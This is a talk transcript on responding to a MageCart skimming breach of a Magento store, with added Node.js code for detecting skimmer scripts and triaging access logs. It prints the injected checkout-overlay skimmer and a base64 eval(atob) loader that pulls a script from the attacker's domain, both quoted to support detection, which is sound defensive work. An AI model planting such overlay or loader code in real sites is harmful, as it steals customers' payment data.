Locking down your Magento store

With the increasing prevalence of MageCart and other JavaScript-based attacks, I share our experience responding to a breach and the process to go through. I also discuss the challenge of balancing the security team's requirements with those of the ecommerce team.

Tom Robertshaw

May 01, 2019

Transcript

  1. Locking down your Magento Shop. Tom Robertshaw, @bobbyshaw

  2. MageCart. And 10,000s more.

  3. MageCart. • 20 lines of JS • Duplicates form submissions to a dead-drop • Invisible to merchant and customer

  4. Dude, where's my checkout?

  5. Identify. "The checkout's broken." "Wait a minute, that's not our checkout."

  6. Identify. eval(atob("ZnVuY3Rpb24gc2V0QzAxKG5hbWUsdmFsdWUsZGF5..."));

  7. Identify. The injected script that replaced the checkout:

     if (document.title == "One Step Checkout | Merchant Name") {
         var __gt2 = "https://api-secure-checkout.com";
         var __b0 = document.body;
         __b0.insertAdjacentHTML('beforebegin', '<iframe src=' + __gt2 + '/checkout_merchantname.php?id=" id="XBA323" width="100%" height="1000px" frameBorder="0"></iframe>');
         __b0.style.display = "none";
     }
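A worked example added to this transcript (not the speaker's code): a static pass in Node.js over a saved copy of a checkout page that surfaces the two indicators shown on slides 6 and 7, an eval(atob("...")) loader and a script that inserts an iframe over the checkout and hides the real body, and lists every script host that is not the store's own. The store hostnames in FIRST_PARTY_HOSTS, the analytics host, the sample page and the base64 loader are constructed for the example; only the overlay snippet itself is modelled on the slide.

```javascript
// Added example, not code from the talk: a static triage pass over page HTML
// for the skimmer indicators described on slides 6 and 7. FIRST_PARTY_HOSTS,
// the sample page, the analytics host and the base64 loader are assumptions
// constructed for this example.

const FIRST_PARTY_HOSTS = new Set(['www.example-store.test', 'cdn.example-store.test']);

// Constructed payload of the kind eval(atob(...)) unpacks: a stage-two loader.
const LOADER_B64 = Buffer.from(
  'var s=document.createElement("script");' +
  's.src="https://api-secure-checkout.com/m.js";' +
  'document.head.appendChild(s);', 'utf8').toString('base64');

// Constructed sample page: one first-party script, one third-party script
// and two injected inline scripts modelled on slides 6 and 7.
const SAMPLE_HTML = `<!doctype html><html><head>
<title>One Step Checkout | Merchant Name</title>
<script src="https://cdn.example-store.test/js/checkout.js"></script>
<script src="//stats.analytics-vendor.test/t.js"></script>
<script>eval(atob("${LOADER_B64}"));</script>
</head><body>
<script>
if (document.title == "One Step Checkout | Merchant Name") {
  var __gt2 = "https://api-secure-checkout.com";
  var __b0 = document.body;
  __b0.insertAdjacentHTML('beforebegin', '<iframe src=' + __gt2 + '/checkout_merchantname.php?id=" id="XBA323" width="100%" height="1000px" frameBorder="0"></iframe>');
  __b0.style.display = "none";
}
</script>
</body></html>`;

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const EVAL_ATOB_RE = /eval\s*\(\s*atob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)\s*\)/g;
const HOST_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Hosts referenced in `text` that are not the store's own.
function externalHosts(text) {
  const hosts = new Set();
  for (const [, host] of text.matchAll(HOST_RE)) {
    const h = host.toLowerCase();
    if (!FIRST_PARTY_HOSTS.has(h)) hosts.add(h);
  }
  return [...hosts];
}

// Walk every <script> in the page and return a list of findings:
//   external-script  : a script tag loaded from a host outside the store
//   eval-atob        : a base64-obfuscated loader, decoded one level
//   checkout-overlay : a script that injects an <iframe> and/or hides <body>
function findSkimmerIndicators(html) {
  const findings = [];
  for (const [, attrs, body] of html.matchAll(SCRIPT_RE)) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      // Protocol-relative URLs (//host/...) are common on CDNs; normalise them.
      for (const host of externalHosts(src[1].replace(/^\/\//, 'https://'))) {
        findings.push({ type: 'external-script', host });
      }
      continue;
    }
    for (const [, b64] of body.matchAll(EVAL_ATOB_RE)) {
      const decoded = Buffer.from(b64, 'base64').toString('utf8');
      findings.push({ type: 'eval-atob', hosts: externalHosts(decoded), preview: decoded.slice(0, 60) });
    }
    const injectsIframe = /insertAdjacentHTML\s*\([\s\S]*?<iframe/i.test(body);
    const hidesBody = /document\.body[\s\S]*?\.style\.display\s*=\s*["']none["']/.test(body);
    if (injectsIframe || hidesBody) {
      findings.push({ type: 'checkout-overlay', injectsIframe, hidesBody, hosts: externalHosts(body) });
    }
  }
  return findings;
}

console.log(JSON.stringify(findSkimmerIndicators(SAMPLE_HTML), null, 2));
```

Only one layer of base64 is decoded here; real loaders nest several layers and build strings by concatenation, so treat any eval, atob or Function use in storefront JavaScript as something to review rather than matching only this exact pattern. The same pass, run on a schedule against a fetched copy of the checkout page and compared with the previous run, is a cheap form of the Monitor step later in the talk.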
  8. Preserve. • Admin user ◦ name, email, changed and updated at • Misc Scripts config ◦ the breach (the injected code)

  9. Remove Hack. • Delete admin user • Remove script from Misc Scripts config • Review and redeploy all files

  10. Investigate. • When? • What? • How?

  11. Investigate. • Admin actions log • Web server access log:

     216.151.184.62 - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034
     216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907
     216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200
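A worked example added to this transcript (not the speaker's code): a Node.js triage pass over access-log lines in the format shown on slide 11 that flags the requests telling the story of this breach (a hit on the Magento Downloader, an admin user being created, and a save of the design configuration section, which is where Misc Scripts lives) and groups them into a per-IP timeline. The three lines from the slide are reused as sample input; the other lines, the addresses in them, and the assumption that the admin path prefix is the default "admin" (many stores rename it) are constructed for the example.

```javascript
// Added example, not code from the talk: triage of web server access-log
// lines for the Magento 1 requests that matter in this kind of breach.
// Assumptions: Apache/nginx combined-style log lines, default "admin"
// path prefix. The sample log mixes the slide's three lines with
// constructed benign traffic.

const SAMPLE_LOG = `
216.151.184.62 - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034
203.0.113.5 - - [04/Feb/2019:14:40:02 +0000] "GET /checkout/onepage/ HTTP/1.1" 200 24110
198.51.100.7 - - [04/Feb/2019:14:45:31 +0000] "GET /index.php/admin/ HTTP/1.1" 302 -
216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907
216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200
203.0.113.9 - - [04/Feb/2019:15:30:00 +0000] "POST /checkout/onepage/saveOrder/ HTTP/1.1" 200 512
`;

// ip ident user [time] "METHOD path proto" status [bytes]
// The byte count is optional because the slide's last line lacks it.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})(?: (\S+))?/;

// Paths worth flagging (assumed default admin prefix). /new and /save are
// the two halves of creating an admin user in the Magento 1 backend.
const INDICATORS = [
  { name: 'downloader',             re: /^\/downloader(\/|$)/ },
  { name: 'admin-user-new-or-save', re: /\/admin\/permissions_user\/(new|save)\//, methods: ['GET', 'POST'] },
  { name: 'design-config-save',     re: /\/admin\/system_config\/save\/section\/design\//, methods: ['POST'] },
];

function parseLine(line) {
  const m = LOG_RE.exec(line.trim());
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Name of the indicator an entry trips, or null. Only successful requests
// count: a 403 on /downloader/ is scanner noise, a 200 is not.
function classify(entry) {
  if (entry.status >= 400) return null;
  for (const ind of INDICATORS) {
    if (ind.re.test(entry.path) && (!ind.methods || ind.methods.includes(entry.method))) {
      return ind.name;
    }
  }
  return null;
}

// Map<ip, [{time, method, path, hit}]> for every address that tripped at
// least one indicator, in log order, so the When/What/How questions of
// slide 10 can be answered per address.
function triageLog(text) {
  const timeline = new Map();
  for (const line of text.split('\n')) {
    const e = parseLine(line);
    if (!e) continue;
    const hit = classify(e);
    if (!hit) continue;
    if (!timeline.has(e.ip)) timeline.set(e.ip, []);
    timeline.get(e.ip).push({ time: e.time, method: e.method, path: e.path, hit });
  }
  return timeline;
}

// An address that both created an admin user and saved the design config
// is the one whose every other request should be pulled next.
function likelyAttackerIps(timeline) {
  return [...timeline]
    .filter(([, hits]) => {
      const names = new Set(hits.map(h => h.hit));
      return names.has('admin-user-new-or-save') && names.has('design-config-save');
    })
    .map(([ip]) => ip);
}

for (const [ip, hits] of triageLog(SAMPLE_LOG)) {
  console.log(ip);
  for (const h of hits) console.log(`  ${h.time} ${h.method} ${h.path} -> ${h.hit}`);
}
console.log('likely attacker:', likelyAttackerIps(triageLog(SAMPLE_LOG)));
```

The admin URL in Magento 1 carries a per-session key segment, so match on the controller path rather than the full URL. Once an address is flagged, pull every request from it across the whole retention window: the first Downloader hit here is six days before the config save, and the earlier activity is where the initial access method usually shows up.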
  12. Investigate. • Code vulnerability ◦ core, third-party plugins, bespoke plugins • Admin access ◦ brute force, infected staff computers • External software ◦ phpMyAdmin (Adminer), Magmi

  13. Close Up Breach. • Rotate passwords • Remove Downloader • Implement the next level of security ◦ e.g. IP-restricted admin

  14. Close Up Breach. ✉ Report the nefarious domain and IP to the registrar and host.

  15. Report. • Customers • ICO • Payment providers • Insurers

  16. Monitor. Monitor for new breaches.

  17. Security Monitoring: https://sansec.io/

  18. Breach Response Summary. 1. Identify 2. Preserve 3. Remove Hack 4. Investigate 5. Close up breach 6. Report 7. Monitor

  19. No one is safe. "I use an iframe payment gateway, I'm safe."

  20. What should you do? How much should you spend?

  21. Business Impact. • Fines from Visa & Mastercard • Increased transaction costs • Increased business insurance costs • Fines from the ICO • Loss of business as customers lose trust • Time & money spent investigating and resolving the hack

  22. The Dichotomy. Marketing team vs security team. Flexibility vs control.

  23. Admin Security. • Password management tool • Two-factor auth or IP whitelisting

  24. Firewalls. Web application firewall, e.g. Cloudflare

  25. Code. • Keep core & modules up to date • Security audit each module

  26. Subresource Integrity. • Sign your JS where possible.

     <script integrity="sha256-ZGMHgi9G7WU+Z7WiP2suSn84yzoN83sGf9nMWJhVHAw=" src="//cdn.shopify.com/s/assets/storefront/express_buttons-646307822f46ed653e67b5a23f6b2e4a7f38cb3a0df37b067fd9cc5898551c0c.js"></script>

  27. Content Security Policies. Block/monitor loaded assets:

     Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://test-report.trackcsp.com/v1/494b06af-eb50-4c85-9097-aa7c31e591b9
  28. Listen to Industry Experts. @gwillem, @_talesh

  29. Talesh Seeparsan's Incident Response Template: https://github.com/talesh/response

  30. Thanks. @bobbyshaw